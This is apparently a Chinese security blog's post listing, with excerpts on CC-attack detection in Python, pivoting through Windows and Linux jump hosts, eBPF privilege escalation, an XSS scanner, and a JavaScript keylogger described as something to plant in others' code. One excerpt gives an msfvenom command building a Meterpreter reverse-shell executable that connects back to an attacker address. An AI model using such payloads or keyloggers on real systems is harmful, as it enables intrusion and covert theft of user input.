- 博客(28)
- 收藏
- 关注
RSS订阅原创 python制作类似wazuh预警cc攻击功能
以下目标 利用Python检测CC攻击 (1)用命令获取数量进行预警 (2)使用纯Python处理命令输出结果,不借助于命令 (3)如果出现预警后,利用Python调用防火漆对IP地址进行封锁。 import osimport reimport timefrom collections import Counterdef get_uptime(): cmd = "uptime |awk -F ', ' '{print $5}'" # 获取5分钟的cpu负载 r
2023-04-13 03:00:00
348
原创 内网攻击跳板机为Windows
攻击机kali 192.168.114.62 仅可和 192.168.114.63 通信 中间机 192.168.114.63 和 10.10.10.128 windows 2016 server 内网机 10.10.10.129 10.10.10.130 Linux和windos kali生成对应的shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.114.62 LPORT=4444 -f exe > /tmp/s
2023-04-12 01:45:00
166
原创 内网攻击跳板机为Linux
攻击机 Kali 192.168.114.62 跳板机 Linux 192.168.114.84 10.10.10.200 TYPE=EthernetPROXY_METHOD=noneBROWSER_ONLY=noBOOTPROTO=staticDEFROUTE=yesIPV4_FAILURE_FATAL=noIPV6INIT=yesIPV6_AUTOCONF=yesIPV6_DEFROUTE=yesIPV6_FAILURE_FATAL=noIPV6_ADDR_GEN_MODE=s
2023-04-12 00:15:00
262
1
原创 Linux Kernel eBPF权限提升漏洞复现
原理 漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,从而进行本地提权 创建新用户开始使用新用户提权 内核修改完成同样需要,环境yum -y install gcc automake autoconf libtool make,还要unzip make CFLAGS=-std=c99 编译不成功 直接找了一个编译成功的,给权限执行完成
2023-04-10 02:30:00
180
原创 python对xss扫描器的基础开发
针对xss漏洞进行扫描器开发,实际测试中,xss小游戏靶场可以完成前10关,后面关卡使用字典够的话理论上也可以
2023-03-29 01:00:00
614
原创 js制作一个监视键盘按键并可以记入日志的功能
这个功能主要是,使用beef时发现的这个功能,于是进行仿造了一个类似的功能,用js方便植入到别人代码中(没有写远程获取的部分)
2023-03-27 04:15:00
161
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人